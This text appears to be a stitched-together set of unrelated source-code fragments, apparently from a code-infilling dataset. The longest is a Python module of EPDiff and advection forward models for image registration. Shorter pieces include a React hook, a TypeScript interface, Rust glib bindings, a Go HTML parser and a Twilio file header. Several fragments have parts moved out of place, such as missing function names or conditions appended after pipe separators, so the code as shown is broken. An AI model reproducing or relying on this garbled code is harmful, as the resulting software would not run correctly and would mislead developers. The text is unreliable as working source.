rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1] -self.fdt_ne.dYc(I)*v[:,1:2]-self.fdt_ne.dZc(I)*v[:,2:3]
else:
raise ValueError('Only supported up to dimension 3')
return rhs_ret
def rhs_scalar_conservation_multiNC(self, I, v):
"""
Scalar conservation law for a batch of images which can be multi-channel. Expected image format here, is
BxCxXxYxZ, where B is the number of images (batch size), C, the number of channels
per image and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
:math:`-div(Iv)`
:param I: Image batch BxCIxXxYxZ
:param v: Velocity fields (this will be one velocity field per image) BxCxXxYxZ
:return: Returns the RHS of the scalar conservation law equations involved BxCxXxYxZ
"""
rhs_ret=self._rhs_scalar_conservation_multiN(I, v)
return rhs_ret
def _rhs_scalar_conservation_multiN(self, I, v):
"""
:param I: One-channel input image: Bx1xXxYxZ
:param v: velocity field BxCxXxYxZ
:return: Returns the RHS of the scalar-conservation law equation for one channel BxXxYxZ
"""
if self.dim==1:
rhs_ret = -self.fdt_ne.dXc(I*v[:,0:1])
elif self.dim==2:
rhs_ret = -self.fdt_ne.dXc(I*v[:,0:1]) -self.fdt_ne.dYc(I*v[:,1:2])
elif self.dim==3:
rhs_ret = -self.fdt_ne.dXc(I* v[:,0:1]) -self.fdt_ne.dYc(I*v[:,1:2])-self.fdt_ne.dZc(I*v[:,2:3])
else:
raise ValueError('Only supported up to dimension 3')
return rhs_ret
def rhs_lagrangian_evolve_map_multiNC(self, phi, v):
"""
Evolves a set of N maps (for N images). Expected format here, is
BxCxXxYxZ, where B is the number of images/maps (batch size), C, the number of channels
per (here the spatial dimension for the map coordinate functions),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D).
This is used to evolve the map going from source to target image. Requires interpolation
so should if at all possible not be used as part of an optimization.
The idea behind computing the inverse map is that the map is defined in the
source space and describes where each point moves to (whereas a map defined in
the target space describes where each point comes from). In this situation we
only need to sample the velocity at the current map position and accumulate it
over the time steps: since the advection step moves the image (or the map-based
image) by v, the same velocity field is shared by all coordinates, so it is
safe to compute the update this way.
:math:`v\circ\phi`
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return: Returns the RHS of the evolution equations involved BxCxXxYxZ
:param phi:
:param v:
:return:
"""
rhs_ret = utils.compute_warped_image_multiNC(v, phi, spacing=self.spacing, spline_order=1,zero_boundary=False)
return rhs_ret
def rhs_advect_map_multiNC(self, phi, v):
'''
Advects a set of N maps (for N images). The expected format is
BxCxXxYxZ, where B is the number of images/maps (batch size), C the number of channels
(here the spatial dimension, i.e. one channel per map coordinate function),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D).
:math:`-D\\phi v`
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return: Returns the RHS of the advection equations involved BxCxXxYxZ
'''
sz = phi.size()
rhs_ret = self._rhs_advect_map_call(phi, v)
return rhs_ret
def _rhs_advect_map_call(self,phi,v):
"""
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return rhsphi: Returns the RHS of the advection equations involved BxCxXxYxZ
"""
fdc = self.fdt_le # use linear extrapolation for the boundary conditions
if self.dim==1:
dxc_phi = -fdc.dXc(phi)
rhsphi = v[:, 0:1] * dxc_phi
elif self.dim==2:
dxc_phi = -fdc.dXc(phi)
dyc_phi = -fdc.dYc(phi)
rhsphi = v[:, 0:1] * dxc_phi + v[:, 1:2] * dyc_phi
elif self.dim==3:
dxc_phi = -fdc.dXc(phi)
dyc_phi = -fdc.dYc(phi)
dzc_phi = -fdc.dZc(phi)
rhsphi = v[:,0:1]*dxc_phi + v[:,1:2]*dyc_phi + v[:,2:3]*dzc_phi
else:
raise ValueError('Only supported up to dimension 3')
return rhsphi
def rhs_epdiff_multiNC(self, m, v):
'''
Computes the right hand side of the EPDiff equation for N momenta (for N images).
The expected format is BxCxXxYxZ, where B is the number of momenta (batch size), C
the number of channels (here the spatial dimension of the momenta),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D).
This is a newer version in which the batch is no longer processed separately.
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:param m: momenta batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
'''
sz = m.size()
rhs_ret = MyTensor(sz).zero_()
rhs_ret = self._rhs_epdiff_call(m, v, rhs_ret)
return rhs_ret
def _rhs_epdiff_call(self, m, v,rhsm):
"""
:param m: momenta batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return rhsm: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
"""
# if self.use_neumann_BC_for_map:
# fdc = self.fdt_ne # use zero Neumann boundary conditions
# else:
# fdc = self.fdt_le # do linear extrapolation
fdc = self.fdt_ne
#fdc = self.fdt_le
if self.dim == 1:
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dxc_v = -fdc.dXc(v)
dxc_v_multi_m = dxc_v * m
rhsm[:]= dxc_mv0 + dxc_v_multi_m
elif self.dim == 2:
# (m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm (EPDiff equation)
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dyc_mv1 = -fdc.dYc(m*v[:,1:2])
dc_mv_sum = dxc_mv0 + dyc_mv1
dxc_v = -fdc.dXc(v)
dyc_v = -fdc.dYc(v)
dxc_v_multi_m = dxc_v * m
dyc_v_multi_m = dyc_v * m
dxc_v_multi_m_sum = torch.sum(dxc_v_multi_m, 1)
dyc_v_multi_m_sum = torch.sum(dyc_v_multi_m, 1)
rhsm[:,0, :, :] = dc_mv_sum[:,0] + dxc_v_multi_m_sum
rhsm[:,1, :, :] = dc_mv_sum[:,1] + dyc_v_multi_m_sum
elif self.dim == 3:
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dyc_mv1 = -fdc.dYc(m*v[:,1:2])
dzc_mv2 = -fdc.dZc(m*v[:,2:3])
dc_mv_sum = dxc_mv0 + dyc_mv1 + dzc_mv2
dxc_v = -fdc.dXc(v)
dyc_v = -fdc.dYc(v)
dzc_v = -fdc.dZc(v)
dxc_v_multi_m = dxc_v*m
dyc_v_multi_m = dyc_v*m
dzc_v_multi_m = dzc_v*m
dxc_v_multi_m_sum = torch.sum(dxc_v_multi_m,1)
dyc_v_multi_m_sum = torch.sum(dyc_v_multi_m,1)
dzc_v_multi_m_sum = torch.sum(dzc_v_multi_m,1)
rhsm[:, 0] = dc_mv_sum[:,0] + dxc_v_multi_m_sum
rhsm[:, 1] = dc_mv_sum[:,1] + dyc_v_multi_m_sum
rhsm[:, 2] = dc_mv_sum[:,2] + dzc_v_multi_m_sum
else:
raise ValueError('Only supported up to dimension 3')
return rhsm
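# For reference, in 2D the code above computes, for momentum channel i of each batch entry,
#   rhs_m_i = -( d/dx(m_i*v_1) + d/dy(m_i*v_2) )       # -div(m_i v)
#             - ( m_1*d(v_1)/dx_i + m_2*d(v_2)/dx_i )  # -((Dv)^T m)_i, with x_1 = x, x_2 = y
# which matches the stated right hand side -(div(m_1 v),...,div(m_d v))^T - (Dv)^T m.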
def rhs_adapt_epdiff_wkw_multiNC(self, m, v,w, sm_wm,smoother):
'''
Computes the right hand side of the EPDiff equation for N momenta (for N images).
The expected format is BxCxXxYxZ, where B is the number of momenta (batch size), C
the number of channels (here the spatial dimension of the momenta),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D).
This is a newer version in which the batch is no longer processed separately.
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:param m: momenta batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
'''
sz = m.size()
rhs_ret = MyTensor(sz).zero_()
rhs_ret = self._rhs_adapt_epdiff_wkw_call(m, v,w,sm_wm,smoother, rhs_ret)
return rhs_ret
def _rhs_adapt_epdiff_wkw_call(self, m, v,w,sm_wm, smoother, rhsm):
"""
:param m: momenta batch BxCxXxYxZ
:param sm_wm: smoothed weighted momentum, smoothed(wm): batch x K x dim x X x Y x ...
:param w: smoothing weights: batch x K x X x Y x ...
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return rhsm: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
"""
# if self.use_neumann_BC_for_map:
# fdc = self.fdt_ne # use zero Neumann boundary conditions
# else:
# fdc = self.fdt_le # do linear extrapolation
fdc = self.fdt_ne
rhs = self._rhs_epdiff_call(m,v,rhsm)
ret_var = torch.empty_like(rhs)
# ret_var, rhs should batch x dim x X x Yx ..
dim = m.shape[1]
sz = [m.shape[0]]+[1]+list(m.shape[1:]) # batchx1xdimx X x Y
m = m.view(*sz)
m_sm_wm = m* sm_wm
m_sm_wm = m_sm_wm.sum(dim=2)
sm_m_sm_wm = smoother.smooth(m_sm_wm) # batchx K x X xY...
dxc_w = fdc.dXc(w)
dc_w_list = [dxc_w]
if dim == 2 or dim == 3:
dyc_w = fdc.dYc(w)
dc_w_list.append(dyc_w)
if dim == 3:
dzc_w = fdc.dZc(w) # batch x K x X xY ...
dc_w_list.append(dzc_w)
for i in range(dim):
ret_var[:, i] = rhs[:, i] + (sm_m_sm_wm* dc_w_list[i]).sum(1)
return ret_var
class ForwardModel(with_metaclass(ABCMeta, object)):
"""
Abstract forward model class. Should never be instantiated.
Derived classes require the definition of f(self,t,x,u,pars) and u(self,t,pars).
These functions will be used for integration: x'(t) = f(t,x(t),u(t))
"""
def __init__(self, sz, spacing, params=None):
'''
Constructor of abstract forward model class
:param sz: size of images
:param spacing: numpy array for spacing in x,y,z directions
'''
self.dim = spacing.size # spatial dimension of the problem
"""spatial dimension"""
self.spacing = spacing
"""spatial spacing"""
self.sz = sz
"""image size (BxCxXxYxZ)"""
self.params = params
"""ParameterDict instance holding parameters"""
self.rhs = RHSLibrary(self.spacing)
"""rhs library support"""
if self.dim>3 or self.dim<1:
raise ValueError('Forward models are currently only supported in dimensions 1 to 3')
self.debug_mode_on =False
@abstractmethod
def f(self,t,x,u,pars,variables_from_optimizer=None):
"""
Function to be integrated
:param t: time
:param x: state
:param u: input
:param pars: optional parameters
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: the function value, should return a list (to support easy concatenations of states)
"""
pass
def u(self,t,pars,variables_from_optimizer=None):
"""
External input
:param t: time
:param pars: parameters
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: the external input
"""
return []
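# --- illustrative sketch (not part of the original module) -------------------------------
# The ForwardModel contract above only requires f(); u() defaults to "no external input".
# A minimal, hedged example of a derived class (the name ZeroFlow is hypothetical):
#
#   class ZeroFlow(ForwardModel):
#       def f(self, t, x, u, pars=None, variables_from_optimizer=None):
#           # x'(t) = 0: every state variable stays constant
#           return [torch.zeros_like(xi) for xi in x]
# ------------------------------------------------------------------------------------------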
class AdvectMap(ForwardModel):
"""
Forward model to advect an n-D map using a transport equation: :math:`\\Phi_t + D\\Phi v = 0`.
v is treated as an external argument and :math:`\\Phi` is the state
"""
def __init__(self, sz, spacing, params=None,compute_inverse_map=False):
super(AdvectMap,self).__init__(sz,spacing,params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
def u(self,t, pars, variables_from_optimizer=None):
"""
External input, to hold the velocity field
:param t: time (ignored; not time-dependent)
:param pars: assumes an n-D velocity field is passed as the only input argument
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: Simply returns this velocity field
"""
return pars['v']
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of transport equation:
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the map, :math:`\\Phi`, itself (assumes a 3D-5D array; [nrI,0,:,:] are the x-coordinates, [nrI,1,:,:] the y-coordinates, ...)
:param u: external input, will be the velocity field here
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [phi]
"""
if self.compute_inverse_map:
return [self.rhs.rhs_advect_map_multiNC(x[0], u),self.rhs.rhs_lagrangian_evolve_map_multiNC(x[1], u)]
else:
return [self.rhs.rhs_advect_map_multiNC(x[0],u)]
class AdvectImage(ForwardModel):
"""
Forward model to advect an image using a transport equation: :math:`I_t + \\nabla I^Tv = 0`.
v is treated as an external argument and I is the state
"""
def __init__(self, sz, spacing, params=None):
super(AdvectImage, self).__init__(sz, spacing,params)
def u(self,t, pars, variables_from_optimizer=None):
"""
External input, to hold the velocity field
:param t: time (ignored; not time-dependent)
:param pars: assumes an n-D velocity field is passed as the only input argument
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: Simply returns this velocity field
"""
return pars['v']
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of transport equation: :math:`-\\nabla I^T v`
:param t: time (ignored; not time-dependent)
:param x: state, here the image, I, itself (supports multiple images and channels)
:param u: external input, will be the velocity field here
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [I]
"""
return [self.rhs.rhs_advect_image_multiNC(x[0],u)]
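# Hedged usage sketch for the transport models above; t, sz, spacing, params, I, v and dt
# are illustrative placeholders, not values defined in this module:
#
#   model = AdvectImage(sz, spacing, params)
#   dIdt = model.f(t, [I], model.u(t, {'v': v}))[0]  # one right-hand-side evaluation
#   I_next = I + dt * dIdt                           # a single explicit Euler step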
class EPDiffImage(ForwardModel):
"""
Forward model for the EPdiff equation. State is the momentum, m, and the image I:
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`I_t+\\nabla I^Tv=0`
"""
def __init__(self, sz, spacing, smoother, params=None):
super(EPDiffImage, self).__init__(sz, spacing,params)
self.smoother = smoother
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:param t: time (ignored; not time-dependent)
:param x: state, here the vector momentum, m, and the image, I
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,I]
"""
# assume x[0] is m and x[1] is I for the state
m = x[0]
I = x[1]
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I': I}),variables_from_optimizer)
# print('max(|v|) = ' + str( v.abs().max() ))
return [self.rhs.rhs_epdiff_multiNC(m,v), self.rhs.rhs_advect_image_multiNC(I,v)]
class EPDiffMap(ForwardModel):
"""
Forward model for the EPDiff equation. State is the momentum, m, and the transform, :math:`\\phi`
(mapping the source image to the target image).
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`\\phi_t+D\\phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None,compute_inverse_map=False):
super(EPDiffMap, self).__init__(sz,spacing,params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
self.smoother = smoother
self.use_net = self.params['smoother']['type'] == 'adaptiveNet'
def debugging(self,input,t):
x = utils.checkNan(input)
if np.sum(x):
print("find nan at {} step".format(t))
print("flag m: {}, ".format(x[0]))
print("flag v: {},".format(x[1]))
print("flag phi: {},".format(x[2]))
print("flag new_m: {},".format(x[3]))
print("flag new_phi: {},".format(x[4]))
raise ValueError("nan error")
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the vector momentum, m, and the map, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,phi]
"""
# assume x[0] is m and x[1] is phi for the state
m = x[0]
m = m.clamp(max=1., min=-1.)
phi = x[1]
if self.compute_inverse_map:
phi_inv = x[2]
| v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'phi':phi}),variables_from_optimizer)
else:
v = self.smoother.adaptive_smooth(m, phi, using_map=True)
# print('max(|v|) = ' + str( v.abs().max() ))
if self.compute_inverse_map:
ret_val= [self.rhs.rhs_epdiff_multiNC(m,v),
self.rhs.rhs_advect_map_multiNC(phi,v),
self.rhs.rhs_lagrangian_evolve_map_multiNC(phi_inv,v)]
else:
new_m = self.rhs.rhs_epdiff_multiNC(m,v)
new_phi = self.rhs.rhs_advect_map_multiNC(phi,v)
ret_val= [new_m, new_phi]
return ret_val
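# Note on the state layout used by EPDiffMap.f above: x[0] is the momentum m, x[1] the map
# phi, and x[2] the inverse map phi_inv when compute_inverse_map is True; the returned list
# mirrors this layout. A hedged single-evaluation sketch (all inputs are placeholders):
#
#   dm, dphi = EPDiffMap(sz, spacing, smoother, params).f(t, [m, phi], None)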
class EPDiffAdaptMap(ForwardModel):
"""
Forward model for the EPDiff equation. State is the momentum, m, and the transform, :math:`\\phi`
(mapping the source image to the target image).
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`\\phi_t+D\\phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None, compute_inverse_map=False, update_sm_by_advect= True, update_sm_with_interpolation=True,compute_on_initial_map=True):
super(EPDiffAdaptMap, self).__init__(sz, spacing, params)
from . import module_parameters as pars
from . import smoother_factory as sf
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
self.smoother = smoother
self.update_sm_by_advect = update_sm_by_advect
self.use_the_first_step_penalty = True
self.update_sm_with_interpolation = update_sm_with_interpolation
self.compute_on_initial_map=compute_on_initial_map
self.update_sm_weight=None
self.velocity_mask = None
self.debug_mode_on = False
s_m_params = pars.ParameterDict()
s_m_params['smoother']['type'] = 'gaussian'
s_m_params['smoother']['gaussian_std'] =self.params['smoother']['deep_smoother']['deep_network_local_weight_smoothing']
self.embedded_smoother = sf.SmootherFactory(sz[2:], spacing).create_smoother(
s_m_params)
""" if only take the first step penalty as the total penalty, otherwise accumluate the penalty"""
def debug_nan(self, input, t,name=''):
x = utils.checkNan([input])
if np.sum(x):
# print(input[0])
print("find nan at {} step, {} with number {}".format(t,name,x[0]))
raise ValueError("nan error")
def init_zero_sm_weight(self,sm_weight):
self.update_sm_weight = torch.zeros_like(sm_weight).detach()
def init_velocity_mask(self,velocity_mask):
self.velocity_mask = velocity_mask
def debug_distrib(self,var,name):
var = var.detach().cpu().numpy()
density,_= np.histogram(var,[-100,-10,-1,0,1,10,100],density=True)
print("{} distri:{}".format(name,density))
def f(self, t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the vector momentum, m, and the map, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,phi]
"""
# assume x[0] is m and x[1] is phi for the state
m = x[0]
m=m.clamp(max=1., min=-1.)
phi = x[1]
return_val_name = []
sm_weight = None
if self.update_sm_by_advect:
if not self.update_sm_with_interpolation:
sm_weight_pre = x[2]
sm_weight = self.embedded_smoother.smooth(sm_weight_pre)
v, extra_ret = self.smoother.smooth(m, None, {'w':sm_weight},multi_output=True)
if self.velocity_mask is not None:
v = v* self.velocity_mask
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_weight_pre = self.rhs.rhs_advect_map_multiNC(sm_weight_pre, v)
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m, v, new_sm_weight_pre, extra_ret,
self.embedded_smoother)
ret_val = [new_m, new_phi,new_sm_weight_pre]
return_val_name =['new_m','new_phi','new_sm_weight']
else:
if self.compute_on_initial_map:
sm_weight = x[2]
sm_phi = x[3]
new_sm_weight = utils.compute_warped_image_multiNC(sm_weight, sm_phi, self.spacing, 1,
zero_boundary=False)
pre_weight = sm_weight
new_sm_weight = self.embedded_smoother.smooth(new_sm_weight)
#print('t{},m min, mean,max {} {} {}'.format(t,m.min().item(),m.mean().item(),m.max().item()))
v,extra_ret = self.smoother.smooth(m,None,{'w': new_sm_weight},multi_output=True)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m,v,pre_weight,extra_ret,self.embedded_smoother)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_phi = self.rhs.rhs_advect_map_multiNC(sm_phi, v)
new_sm_weight = self.update_sm_weight.detach()
ret_val = [new_m, new_phi,new_sm_weight,new_sm_phi]
return_val_name = ['new_m', 'new_phi', 'new_sm_weight','new_sm_phi']
else: # TODO: note that this is the branch currently used
sm_weight = x[2]
new_sm_weight = utils.compute_warped_image_multiNC(sm_weight, phi, self.spacing, 1,
zero_boundary=False)
pre_weight = sm_weight
new_sm_weight = self.embedded_smoother.smooth(new_sm_weight)
v, extra_ret = self.smoother.smooth(m, None,{'w':new_sm_weight}, multi_output=True)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m,v,pre_weight,extra_ret,self.embedded_smoother)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_weight = self.update_sm_weight.detach()
ret_val = [new_m, new_phi, new_sm_weight]
return_val_name = ['new_m', 'new_phi', 'new_sm_weight']
else:
if not t==0:
if self.use_the_first_step_penalty:
self.smoother.disable_penalty_computation()
else:
self.smoother.enable_accumulated_penalty()
I = utils.compute_warped_image_multiNC(pars['I0'], phi, self.spacing, 1,zero_boundary=True)
pars['I'] = I.detach() # TODO check whether I should be detached here
v = self.smoother.smooth(m, None, pars, variables_from_optimizer)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_epdiff_multiNC(m, v)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
ret_val = [new_m, new_phi]
return_val_name =['new_m','new_phi']
if self.debug_mode_on:
toshows = [m, v,phi]+ret_val if sm_weight is None else [m, v,phi]+ret_val +[sm_weight]
name = ['m', 'v','phi']+return_val_name if sm_weight is None else ['m', 'v','phi']+return_val_name +['sm_weight']
for i, toshow in enumerate(toshows):
print('t{},{} min, mean,max {} {} {}'.format(t, name[i], toshow.min().item(), toshow.mean().item(),
toshow.max().item()))
self.debug_distrib(toshow, name[i])
self.debug_nan(toshow,t,name[i])
return ret_val
# print('max(|v|) = ' + str( v.abs().max() ))
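# Summary of the branches in EPDiffAdaptMap.f above: (1) advect the smoothing weights
# directly alongside the map, (2) pull the weights back through the (initial or current)
# map by interpolation, or (3) fall back to the plain EPDiff right hand side with an
# image-dependent smoother. In every case the returned list mirrors the layout of the state x.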
class EPDiffScalarMomentum(ForwardModel):
"""
Base class for scalar momentum EPDiff solutions. Defines a smoother that can be commonly used.
"""
def __init__(self, sz, spacing, smoother, params):
super(EPDiffScalarMomentum,self).__init__(sz,spacing,params)
self.smoother = smoother
class EPDiffScalarMomentumImage(EPDiffScalarMomentum):
"""
Forward model for the scalar momentum EPdiff equation. State is the scalar momentum, lam, and the image I
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`m=\\lambda\\nabla I`
:math:`I_t+\\nabla I^Tv=0`
:math:`\\lambda_t + div(\\lambda v)=0`
"""
def __init__(self, sz, spacing, smoother, params=None):
super(EPDiffScalarMomentumImage, self).__init__(sz, spacing, smoother, params)
def f(self, t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:math:`-div(\\lambda v)`
:param t: time (ignored; not time-dependent)
:param x: state, here the scalar momentum, lam, and the image, I, itself
:param u: no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [lam,I]
"""
# assume x[0] is \lambda and x[1] is I for the state
lam = x[0]
I = x[1]
# now compute the momentum
m = utils.compute_vector_momentum_from_scalar_momentum_multiNC(lam, I, self.sz, self.spacing)
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I':I}),variables_from_optimizer)
# advection for I, scalar-conservation law for lam
return [self.rhs.rhs_scalar_conservation_multiNC(lam, v), self.rhs.rhs_advect_image_multiNC(I, v)]
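# Hedged note: for the scalar-momentum models the vector momentum is reconstructed on the
# fly as m = lam * grad(I) (via compute_vector_momentum_from_scalar_momentum_multiNC), so
# only the one-channel scalar momentum lam has to be stored and integrated per image.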
class EPDiffScalarMomentumMap(EPDiffScalarMomentum):
"""
Forward model for the scalar momentum EPDiff equation. State is the scalar momentum, lam, the image, I, and the transform, phi.
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`m=\\lambda\\nabla I`
:math:`I_t+\\nabla I^Tv=0`
:math:`\\lambda_t + div(\\lambda v)=0`
:math:`\\Phi_t+D\\Phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None, compute_inverse_map=False):
super(EPDiffScalarMomentumMap, self).__init__(sz,spacing, smoother, params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:math:`-div(\\lambda v)`
:math:`-D\\Phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the scalar momentum, lam, the image, I, and the transform, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [lam,I,phi]
"""
# assume x[0] is lam and x[1] is I and x[2] is phi for the state
lam = x[0]
I = x[1]
phi = x[2]
if self.compute_inverse_map:
phi_inv = x[3]
# now compute the momentum
m = utils.compute_vector_momentum_from_scalar_momentum_multiNC(lam, I, self.sz, self.spacing)
# todo: replace this by phi again
#v = self.smoother.smooth(m,None,[phi,True],variables_from_optimizer)
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I':I}),variables_from_optimizer)
if self.compute_inverse_map:
ret_val = [self.rhs.rhs_scalar_conservation_multiNC(lam,v),
self.rhs.rhs_advect_image_multiNC(I,v),
self.rhs.rhs_advect_map_multiNC(phi,v),
self.rhs.rhs_lagrangian_evolve_map_multiNC(phi_inv,v)]
else:
ret_val = [self.rhs.rhs_scalar_conservation_multiNC(lam,v),
self.rhs.rhs_advect_image_multiNC(I,v),
self.rhs.rhs_advect_map_multiNC(phi,v)]
return ret_val | if not self.use_net: |
useSingleState.js | const setFalse = () => setIsTrue(false);
return [isTrue, setTrue, setFalse];
}; | export default useStateHook => () => {
const [isTrue, setIsTrue] = useStateHook(false);
const setTrue = () => setIsTrue(true); |
|
IUserTokensRepository.ts | import UserToken from '../infra/typeorm/entities/UserToken'
| generate(user_id: string): Promise<UserToken>;
findByToken(token: string): Promise<UserToken | undefined>;
} | export default interface IUserTokensRepository { |
unix_mount_point.rs | // Take a look at the license at the top of the repository in the LICENSE file.
use crate::UnixMountPoint;
use glib::translate::*;
use std::mem;
impl UnixMountPoint {
#[cfg(any(unix, feature = "dox"))]
#[doc(alias = "g_unix_mount_points_get")]
pub fn | () -> (Vec<UnixMountPoint>, u64) {
unsafe {
let mut time_read = mem::MaybeUninit::uninit();
let ret = FromGlibPtrContainer::from_glib_full(ffi::g_unix_mount_points_get(
time_read.as_mut_ptr(),
));
let time_read = time_read.assume_init();
(ret, time_read)
}
}
#[doc(alias = "g_unix_mount_points_changed_since")]
pub fn is_changed_since(time: u64) -> bool {
unsafe { from_glib(ffi::g_unix_mount_points_changed_since(time)) }
}
}
| mount_points |
ArticleDetailParser.go | package parser
import (
"github.com/PuerkitoBio/goquery"
"io"
"jobbole_spider/basic_framework/engine"
)
type DetailItem struct {
Title string
Contents string
}
func ParseArticleDetail(reader io.Reader) engine.ParserResult {
doc, err := goquery.NewDocumentFromReader(reader)
if err != nil |
result := engine.ParserResult{}
var items []interface{}
title := doc.Find("div.entry-header").Find("h1").Text()
text := doc.Find("div.entry").Text()
detailItem := DetailItem{title, text}
items = append(items, detailItem)
result.Items = items
return result
}
| {
panic(err)
} |
light.rs | use cglinalg::{
Vector3,
ScalarFloat,
};
#[derive(Copy, Clone, Debug, PartialEq)]
pub struct PointLight<S> {
pub ambient: Vector3<S>,
pub diffuse: Vector3<S>,
pub specular: Vector3<S>,
}
impl<S> PointLight<S> where S: ScalarFloat {
pub fn new(ambient: Vector3<S>, diffuse: Vector3<S>, specular: Vector3<S>) -> PointLight<S> |
}
| {
PointLight {
ambient: ambient,
diffuse: diffuse,
specular: specular,
}
} |
example.go | package main
import _ "crypto/md5"
func | () {
}
| main |
daily.py | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
